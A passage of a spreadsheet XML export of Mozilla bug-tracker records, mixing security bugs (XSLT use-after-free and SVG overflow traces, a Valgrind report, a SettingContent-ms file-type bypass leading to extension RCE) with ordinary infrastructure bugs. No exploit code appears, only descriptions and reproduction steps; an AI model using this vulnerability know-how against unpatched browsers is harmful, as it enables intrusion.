    #10 0x7f1c6d38dbd3 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #11 0x7f1c6d3c5282 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:685:15
    #12 0x7f1c6d3c5b1b in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:717:12
    #13 0x7f1c6cecac60 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:4333:12
    #14 0x7f1c6417b809 in ProcessFile(mozilla::dom::AutoJSAPI&amp;, char const*, _IO_FILE*, bool) /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:886:31
    #15 0x7f1c6417bea2 in Process(mozilla::dom::AutoJSAPI&amp;, char const*, bool) /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:943:15
    #16 0x7f1c6415a0fb in ProcessArgs /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:1144:16
    #17 0x7f1c6415a0fb in XRE_XPCShellMain /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:1578
    #18 0x4defbc in main /home/worker/workspace/build/src/js/xpconnect/shell/xpcshell.cpp:62:18
    #19 0x7f1c5d56382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #20 0x41b958 in _start (/work/firefox/bin/xpcshell+0x41b958)
0x60300006c160 is located 0 bytes inside of 24-byte region [0x60300006c160,0x60300006c178)
freed by thread T0 here:
    #0 0x4b20ab in free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f1c68bc7d4b in txXSLKey::testNode(txXPathNode const&amp;, txKeyValueHashKey&amp;, nsTHashtable&lt;txKeyValueHashEntry&gt;&amp;, txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txKeyFunctionCall.cpp:353:13
    #2 0x7f1c68bc7441 in txXSLKey::indexTree(txXPathNode const&amp;, txKeyValueHashKey&amp;, nsTHashtable&lt;txKeyValueHashEntry&gt;&amp;, txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txKeyFunctionCall.cpp:299:19
    #3 0x7f1c68bc6e93 in txXSLKey::indexSubtreeRoot(txXPathNode const&amp;, nsTHashtable&lt;txKeyValueHashEntry&gt;&amp;, txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txKeyFunctionCall.cpp:283:12
    #4 0x7f1c68bb251e in txKeyHash::getKeyNodes(txExpandedName const&amp;, txXPathNode const&amp;, nsAString_internal const&amp;, bool, txExecutionState&amp;, txNodeSet**) /home/worker/workspace/build/src/dom/xslt/xslt/txKeyFunctionCall.cpp:221:19
    #5 0x7f1c68bc656a in getKeyNodes /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:425:12
    #6 0x7f1c68bc656a in txKeyFunctionCall::evaluate(txIEvalContext*, txAExprResult**) /home/worker/workspace/build/src/dom/xslt/xslt/txKeyFunctionCall.cpp:89
    #7 0x7f1c68bc550a in txValueOf::execute(txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txInstructions.cpp:929:19
    #8 0x7f1c68c1c30d in txXSLTProcessor::execute(txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txXSLTProcessor.cpp:49:14
    #9 0x7f1c68be6138 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:675:14
    #10 0x7f1c68bec01b in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:644:12
    #11 0x7f1c68bec01b in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1321
    #12 0x7f1c6699d27d in mozilla::dom::XSLTProcessorBinding::transformToDocument(JSContext*, JS::Handle&lt;JSObject*&gt;, txMozillaXSLTProcessor*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XSLTProcessorBinding.cpp:154:43
    #13 0x7f1c671ce5a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2857:13
    #14 0x7f1c6d3c2a35 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #15 0x7f1c6d3c2a35 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #16 0x7f1c6d3a8dda in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #17 0x7f1c6d3a8dda in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #18 0x7f1c6d38dbd3 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #19 0x7f1c6d3c5282 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:685:15
    #20 0x7f1c6d3c5b1b in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:717:12
    #21 0x7f1c6cecac60 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:4333:12
    #22 0x7f1c6417b809 in ProcessFile(mozilla::dom::AutoJSAPI&amp;, char const*, _IO_FILE*, bool) /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:886:31
    #23 0x7f1c6417bea2 in Process(mozilla::dom::AutoJSAPI&amp;, char const*, bool) /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:943:15
    #24 0x7f1c6415a0fb in ProcessArgs /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:1144:16
    #25 0x7f1c6415a0fb in XRE_XPCShellMain /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:1578
    #26 0x4defbc in main /home/worker/workspace/build/src/js/xpconnect/shell/xpcshell.cpp:62:18
    #27 0x7f1c5d56382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T0 here:
    #0 0x4b23cb in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4df14d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f1c68baf29c in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f1c68baf29c in txExecutionState::init(txXPathNode const&amp;, txOwningExpandedNameMap&lt;txIGlobalParameter&gt;*) /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:110
    #4 0x7f1c68be6121 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:671:19
    #5 0x7f1c68bec01b in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:644:12
    #6 0x7f1c68bec01b in txMozillaXSLTProcessor::TransformToDocument(nsINode&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1321
    #7 0x7f1c6699d27d in mozilla::dom::XSLTProcessorBinding::transformToDocument(JSContext*, JS::Handle&lt;JSObject*&gt;, txMozillaXSLTProcessor*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XSLTProcessorBinding.cpp:154:43
    #8 0x7f1c671ce5a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2857:13
    #9 0x7f1c6d3c2a35 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #10 0x7f1c6d3c2a35 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #11 0x7f1c6d3a8dda in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #12 0x7f1c6d3a8dda in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #13 0x7f1c6d38dbd3 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #14 0x7f1c6d3c5282 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:685:15
    #15 0x7f1c6d3c5b1b in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:717:12
    #16 0x7f1c6cecac60 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:4333:12
    #17 0x7f1c6417b809 in ProcessFile(mozilla::dom::AutoJSAPI&amp;, char const*, _IO_FILE*, bool) /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:886:31
    #18 0x7f1c6417bea2 in Process(mozilla::dom::AutoJSAPI&amp;, char const*, bool) /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:943:15
    #19 0x7f1c6415a0fb in ProcessArgs /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:1144:16
    #20 0x7f1c6415a0fb in XRE_XPCShellMain /home/worker/workspace/build/src/js/xpconnect/src/XPCShellImpl.cpp:1578
    #21 0x4defbc in main /home/worker/workspace/build/src/js/xpconnect/shell/xpcshell.cpp:62:18
    #22 0x7f1c5d56382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:98:5 in txExecutionState::~txExecutionState()</t>
        </is>
      </c>
      <c r="X2440" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2441">
      <c r="A2441" t="n">
        <v>1468217</v>
      </c>
      <c r="B2441" t="inlineStr">
        <is>
          <t>2018-06-11 09:58:43 -0700</t>
        </is>
      </c>
      <c r="C2441" t="inlineStr">
        <is>
          <t>.SettingContent-ms file extension bypasses 'dangerous file' prompt leading to WebExt RCE</t>
        </is>
      </c>
      <c r="D2441" t="inlineStr">
        <is>
          <t>2024-05-30 09:46:40 -0700</t>
        </is>
      </c>
      <c r="E2441" t="n">
        <v>1</v>
      </c>
      <c r="F2441" t="n">
        <v>1</v>
      </c>
      <c r="G2441" t="n">
        <v>3</v>
      </c>
      <c r="H2441" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2441" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J2441" t="inlineStr">
        <is>
          <t>Untriaged</t>
        </is>
      </c>
      <c r="K2441" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L2441" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2441" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2441" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2441" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2441" t="inlineStr">
        <is>
          <t>[adv-main61+][adv-esr52.9+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2441" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2441" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2441" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T2441" t="n">
        <v>1</v>
      </c>
      <c r="U2441" t="n">
        <v>0</v>
      </c>
      <c r="V2441" t="n">
        <v>41</v>
      </c>
      <c r="W2441" t="inlineStr">
        <is>
          <t>Created attachment 8984850
download.openRCE.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Steps to reproduce:
Download attached SettingContent-ms file, or install attached extension for RCE.
Actual results:
SettingContent-ms is a new windows 10 extension that can be used to execute arbitrary local files with parameters.
Expected results:
Treat it as executable.
I am CCing Matt Nelson who originally found this file, I simply connected the dots with the browser RCE potential. 
He wrote about this file in public https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
Web Extension RCE part is not mentioned.</t>
        </is>
      </c>
      <c r="X2441" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2442">
      <c r="A2442" t="n">
        <v>1202677</v>
      </c>
      <c r="B2442" t="inlineStr">
        <is>
          <t>2015-09-08 07:42:38 -0700</t>
        </is>
      </c>
      <c r="C2442" t="inlineStr">
        <is>
          <t>Hit MOZ_CRASH(css::ImageValue not thread-safe) at c:/Users/mozilla/debug-builds/ mozilla-central/layout/style/nsCSSValue.cpp:2475</t>
        </is>
      </c>
      <c r="D2442" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:46 -0700</t>
        </is>
      </c>
      <c r="E2442" t="n">
        <v>1</v>
      </c>
      <c r="F2442" t="n">
        <v>1</v>
      </c>
      <c r="G2442" t="n">
        <v>3</v>
      </c>
      <c r="H2442" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2442" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2442" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K2442" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2442" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2442" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2442" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2442" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2442" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q2442" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2442" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2442" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T2442" t="n">
        <v>1</v>
      </c>
      <c r="U2442" t="n">
        <v>0</v>
      </c>
      <c r="V2442" t="n">
        <v>23</v>
      </c>
      <c r="W2442" t="inlineStr">
        <is>
          <t>Created attachment 8658191
windgb information from this url
Found by Bughunter
Hit MOZ_CRASH(css::ImageValue not thread-safe) at c:/Users/mozilla/debug-builds/
mozilla-central/layout/style/nsCSSValue.cpp:2475
### ERROR: CreateThread: Access is denied.
Steps to reproduce: 
--&gt; Load http://www.musepen.com/blog/adobe-muse-hover-rolling-push-widget/
--&gt; Hit MOZ_CRASH(css::ImageValue not thread-safe) at c:/Users/mozilla/debug-builds/
mozilla-central/layout/style/nsCSSValue.cpp:2475
### ERROR: CreateThread: Access is denied.</t>
        </is>
      </c>
      <c r="X2442" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2443">
      <c r="A2443" t="n">
        <v>1180818</v>
      </c>
      <c r="B2443" t="inlineStr">
        <is>
          <t>2015-07-06 11:11:42 -0700</t>
        </is>
      </c>
      <c r="C2443" t="inlineStr">
        <is>
          <t>Improve Autoland UI testing</t>
        </is>
      </c>
      <c r="D2443" t="inlineStr">
        <is>
          <t>2016-02-21 20:31:38 -0800</t>
        </is>
      </c>
      <c r="E2443" t="n">
        <v>1</v>
      </c>
      <c r="F2443" t="n">
        <v>1</v>
      </c>
      <c r="G2443" t="n">
        <v>6</v>
      </c>
      <c r="H2443" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2443" t="inlineStr">
        <is>
          <t>MozReview Graveyard</t>
        </is>
      </c>
      <c r="J2443" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2443" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2443" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2443" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2443" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2443" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2443" t="inlineStr"/>
      <c r="Q2443" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2443" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2443" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2443" t="n">
        <v>1</v>
      </c>
      <c r="U2443" t="n">
        <v>0</v>
      </c>
      <c r="V2443" t="n">
        <v>18</v>
      </c>
      <c r="W2443" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1174752 +++
Most of the Autoland tests were written prior to having reviewboard and mercurial in docker containers. We're now in a position to be able to write much better integration tests and we should do so before we start landing revisions to an inbound tree.
I'm splitting this off of Bug 1174752, that bug will focus on .t style tests for Autoland, this one will be for Selenium tests.</t>
        </is>
      </c>
      <c r="X2443" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2444">
      <c r="A2444" t="n">
        <v>1296728</v>
      </c>
      <c r="B2444" t="inlineStr">
        <is>
          <t>2016-08-19 12:04:31 -0700</t>
        </is>
      </c>
      <c r="C2444" t="inlineStr">
        <is>
          <t>Need symbols for libsystem_kernel on all supported OS X versions</t>
        </is>
      </c>
      <c r="D2444" t="inlineStr">
        <is>
          <t>2017-04-21 11:13:35 -0700</t>
        </is>
      </c>
      <c r="E2444" t="n">
        <v>1</v>
      </c>
      <c r="F2444" t="n">
        <v>1</v>
      </c>
      <c r="G2444" t="n">
        <v>4</v>
      </c>
      <c r="H2444" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2444" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2444" t="inlineStr">
        <is>
          <t>Symbols</t>
        </is>
      </c>
      <c r="K2444" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2444" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2444" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2444" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2444" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2444" t="inlineStr"/>
      <c r="Q2444" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2444" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2444" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2444" t="n">
        <v>1</v>
      </c>
      <c r="U2444" t="n">
        <v>0</v>
      </c>
      <c r="V2444" t="n">
        <v>20</v>
      </c>
      <c r="W2444" t="inlineStr">
        <is>
          <t>We have trouble aggregating bugs just based on addresses, as those change between versions of OS X.  For example, bug 1176404.</t>
        </is>
      </c>
      <c r="X2444" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2445">
      <c r="A2445" t="n">
        <v>1338876</v>
      </c>
      <c r="B2445" t="inlineStr">
        <is>
          <t>2017-02-12 02:10:45 -0800</t>
        </is>
      </c>
      <c r="C2445" t="inlineStr">
        <is>
          <t>Out of bound access in nsHttpDigestAuth::ParseChallenge</t>
        </is>
      </c>
      <c r="D2445" t="inlineStr">
        <is>
          <t>2017-10-26 19:06:41 -0700</t>
        </is>
      </c>
      <c r="E2445" t="n">
        <v>1</v>
      </c>
      <c r="F2445" t="n">
        <v>1</v>
      </c>
      <c r="G2445" t="n">
        <v>3</v>
      </c>
      <c r="H2445" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2445" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2445" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2445" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L2445" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2445" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2445" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2445" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2445" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][necko-active][adv-main52+]</t>
        </is>
      </c>
      <c r="Q2445" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2445" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2445" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T2445" t="n">
        <v>1</v>
      </c>
      <c r="U2445" t="n">
        <v>0</v>
      </c>
      <c r="V2445" t="n">
        <v>21</v>
      </c>
      <c r="W2445" t="inlineStr">
        <is>
          <t>Created attachment 8836446
auth.php
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Steps to reproduce:
1. Build firefox with valgrind using instructions mentioned in
   https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Valgrind
2. Download and copy auth.php to local web server.
3. Start firefox
   export VALGRIND_OPTIONS="--smc-check=all-non-file --vex-iropt-register-updates=allregs-at-mem-access --show-mismatched-frees=no --read-inline-info=yes"
  ./mach run --debugger="valgrind" --debugger-args="$VALGRIND_OPTIONS"
4. Visit http://127.0.0.1/auth.php
Actual results:
Valgrind reports this error.
==3063== Conditional jump or move depends on uninitialised value(s)
==3063==    at 0x101B8F28: mozilla::net::nsHttpDigestAuth::ParseChallenge(char const*, nsACString_internal&amp;, nsACString_internal&amp;, nsACString_internal&amp;, nsACString_internal&amp;, bool*, unsigned short*, unsigned short*) [clone .part.144] (nsHttpDigestAuth.cpp:577)
==3063==    by 0x101B958E: ParseChallenge (nsHttpDigestAuth.cpp:163)
==3063==    by 0x101B958E: mozilla::net::nsHttpDigestAuth::ChallengeReceived(nsIHttpAuthenticableChannel*, char const*, bool, nsISupports**, nsISupports**, bool*) (nsHttpDigestAuth.cpp:152)
==3063==    by 0x1016B6B9: mozilla::net::nsHttpChannelAuthProvider::GetCredentialsForChallenge(char const*, char const*, bool, nsIHttpAuthenticator*, nsCString&amp;) (nsHttpChannelAuthProvider.cpp:790)
==3063==    by 0x1016C3DE: mozilla::net::nsHttpChannelAuthProvider::GetCredentials(char const*, bool, nsCString&amp;) (nsHttpChannelAuthProvider.cpp:618)
==3063==    by 0x1016C72F: mozilla::net::nsHttpChannelAuthProvider::ProcessAuthentication(unsigned int, bool) (nsHttpChannelAuthProvider.cpp:198)
==3063==    by 0x101F01C5: mozilla::net::nsHttpChannel::ContinueProcessResponse2(nsresult) [clone .part.419] [clone .constprop.487] (nsHttpChannel.cpp:2209)
==3063==    by 0x101F091F: ContinueProcessResponse2 (nsCOMPtr.h:294)
==3063==    by 0x101F091F: mozilla::net::nsHttpChannel::ContinueProcessResponse1() (nsHttpChannel.cpp:2089)
==3063==    by 0x101F0B6E: mozilla::net::nsHttpChannel::ProcessResponse() (nsHttpChannel.cpp:2009)
==3063==    by 0x101F13A5: mozilla::net::nsHttpChannel::OnStartRequest(nsIRequest*, nsISupports*) (nsHttpChannel.cpp:6523)
==3063==    by 0xFEA068D: nsInputStreamPump::OnStateStart() (nsInputStreamPump.cpp:524)
==3063==    by 0xFEA118F: nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) (nsInputStreamPump.cpp:426)
==3063==    by 0xFDFB013: nsInputStreamReadyEvent::Run() (nsStreamUtils.cpp:96)
==3063== 
Expected results:
Should not have read out of bound value.</t>
        </is>
      </c>
      <c r="X2445" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2446">
      <c r="A2446" t="n">
        <v>653203</v>
      </c>
      <c r="B2446" t="inlineStr">
        <is>
          <t>2011-04-27 11:40:56 -0700</t>
        </is>
      </c>
      <c r="C2446" t="inlineStr">
        <is>
          <t>[stage] Facebook message has our staging url</t>
        </is>
      </c>
      <c r="D2446" t="inlineStr">
        <is>
          <t>2022-03-04 12:32:42 -0800</t>
        </is>
      </c>
      <c r="E2446" t="n">
        <v>1</v>
      </c>
      <c r="F2446" t="n">
        <v>1</v>
      </c>
      <c r="G2446" t="n">
        <v>6</v>
      </c>
      <c r="H2446" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2446" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J2446" t="inlineStr">
        <is>
          <t>markup.mozilla.org</t>
        </is>
      </c>
      <c r="K2446" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2446" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2446" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2446" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2446" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2446" t="inlineStr">
        <is>
          <t>[stage]</t>
        </is>
      </c>
      <c r="Q2446" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2446" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2446" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T2446" t="n">
        <v>1</v>
      </c>
      <c r="U2446" t="n">
        <v>0</v>
      </c>
      <c r="V2446" t="n">
        <v>20</v>
      </c>
      <c r="W2446" t="inlineStr">
        <is>
          <t>Created attachment 528654
Dialog for Facebook post
This may be intentional but I wanted to check (nudging is always better than assuming), the url in the Facebook message currently points to our staging environment.
"https://markup.allizom.org/en/#/linear/YtCx
https://markup.allizom.org/en/#/linear/YtCx"
Additionally did we want a more verbose message about Markup to be included in the Facebook post? Currently only the above urls are being posted to a users wall.
Please see screenshot.</t>
        </is>
      </c>
      <c r="X2446" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2447">
      <c r="A2447" t="n">
        <v>1149542</v>
      </c>
      <c r="B2447" t="inlineStr">
        <is>
          <t>2015-03-31 07:28:28 -0700</t>
        </is>
      </c>
      <c r="C2447" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in SVGTextFrame::ResolvePositions</t>
        </is>
      </c>
      <c r="D2447" t="inlineStr">
        <is>
          <t>2024-05-30 08:59:52 -0700</t>
        </is>
      </c>
      <c r="E2447" t="n">
        <v>1</v>
      </c>
      <c r="F2447" t="n">
        <v>1</v>
      </c>
      <c r="G2447" t="n">
        <v>3</v>
      </c>
      <c r="H2447" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2447" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2447" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2447" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2447" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2447" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2447" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2447" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2447" t="inlineStr">
        <is>
          <t>[adv-main38+][adv-esr31.7+]</t>
        </is>
      </c>
      <c r="Q2447" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2447" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2447" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T2447" t="n">
        <v>1</v>
      </c>
      <c r="U2447" t="n">
        <v>0</v>
      </c>
      <c r="V2447" t="n">
        <v>55</v>
      </c>
      <c r="W2447" t="inlineStr">
        <is>
          <t>Created attachment 8586115
repro-file.svg
Tested on:
OS: Ubuntu 14.04
